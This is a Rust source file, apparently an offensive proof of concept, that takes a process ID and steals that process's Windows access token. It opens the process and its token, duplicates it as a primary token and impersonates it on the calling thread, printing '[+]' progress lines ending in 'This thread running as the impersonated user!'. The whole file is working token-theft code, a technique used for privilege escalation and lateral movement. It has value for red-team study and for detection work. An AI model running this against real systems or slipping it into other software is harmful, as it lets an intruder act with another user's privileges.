use std::{
env,
ptr::null_mut
};
use winapi::{
um::{
processthreadsapi::{
OpenProcess,
OpenProcessToken
},
winnt::{
MAXIMUM_ALLOWED,
TOKEN_QUERY,
TOKEN_DUPLICATE,
TOKEN_IMPERSONATE,
SecurityImpersonation,
TokenPrimary,
PROCESS_QUERY_LIMITED_INFORMATION
},
handleapi::{INVALID_HANDLE_VALUE, CloseHandle},
securitybaseapi::{
DuplicateTokenEx,
ImpersonateLoggedOnUser
},
errhandlingapi::GetLastError
},
shared::{
minwindef::{
FALSE,
DWORD
},
},
ctypes::c_void
};
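/// Opens the process whose PID is given on the command line, duplicates the
/// token obtained from it as a primary token and impersonates that token on
/// the calling thread, reporting each step on stdout.
///
/// Every handle acquired here is closed on every exit path. On any failed
/// Win32 call the `GetLastError` code is printed so the failure can be matched
/// against the Windows system error codes. A missing or non-numeric PID prints
/// the usage line instead of panicking.
///
/// Note: the thread is left impersonating when `main` returns; that is fine
/// only because the process exits immediately afterwards. A longer-lived
/// caller would have to call `RevertToSelf` before continuing.
fn main() {
    let args: Vec<String> = env::args().collect();
    if args.len() != 2 {
        println!("Usage: {} <pid>", args[0]);
        return;
    }

    // The PID is user input: a non-numeric value previously panicked via
    // `unwrap`; treat it as a usage error instead.
    let pid: DWORD = match args[1].parse() {
        Ok(pid) => pid,
        Err(_) => {
            println!("Usage: {} <pid>", args[0]);
            return;
        }
    };

    let mut token: *mut c_void = null_mut();
    let mut duplicated_token: *mut c_void = null_mut();

    // SAFETY: plain Win32 FFI. Every out-pointer refers to a live local, and
    // each handle returned by the API is closed before this function returns.
    unsafe {
        let proc_handle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
        // OpenProcess signals failure with a null handle; INVALID_HANDLE_VALUE
        // is rejected as well so a bogus handle is never passed further on.
        if proc_handle.is_null() || proc_handle == INVALID_HANDLE_VALUE {
            let last_error = GetLastError();
            println!("[-] Failed to open process: {}", last_error);
            return;
        }
        println!("[+] Opened process");

        // TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE is the minimum
        // access needed for the DuplicateTokenEx / ImpersonateLoggedOnUser
        // calls below.
        let token_access = TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE;
        if OpenProcessToken(proc_handle, token_access, &mut token) == 0 {
            let last_error = GetLastError();
            println!("[-] Failed to open process token: {}", last_error);
            CloseHandle(proc_handle);
            return;
        }

        // Duplicate as a primary token (default security attributes, no
        // restrictions); the original handle stays open until cleanup.
        let duplicated = DuplicateTokenEx(
            token,
            MAXIMUM_ALLOWED,
            null_mut(),
            SecurityImpersonation,
            TokenPrimary,
            &mut duplicated_token,
        );
        if duplicated == FALSE {
            let last_error = GetLastError();
            println!("[-] Failed to duplicate token: {}", last_error);
            CloseHandle(token);
            CloseHandle(proc_handle);
            return;
        }
        println!("[+] Duplicated token");

        if ImpersonateLoggedOnUser(duplicated_token) == FALSE {
            let last_error = GetLastError();
            println!("[-] Failed to impersonate user: {}", last_error);
            CloseHandle(duplicated_token);
            CloseHandle(token);
            CloseHandle(proc_handle);
            return;
        }
        println!("[+] This thread running as the impersonated user!");

        // Closing the handles does not end the impersonation; see the doc
        // comment above about `RevertToSelf` for callers that keep running.
        CloseHandle(duplicated_token);
        CloseHandle(token);
        CloseHandle(proc_handle);
    }
}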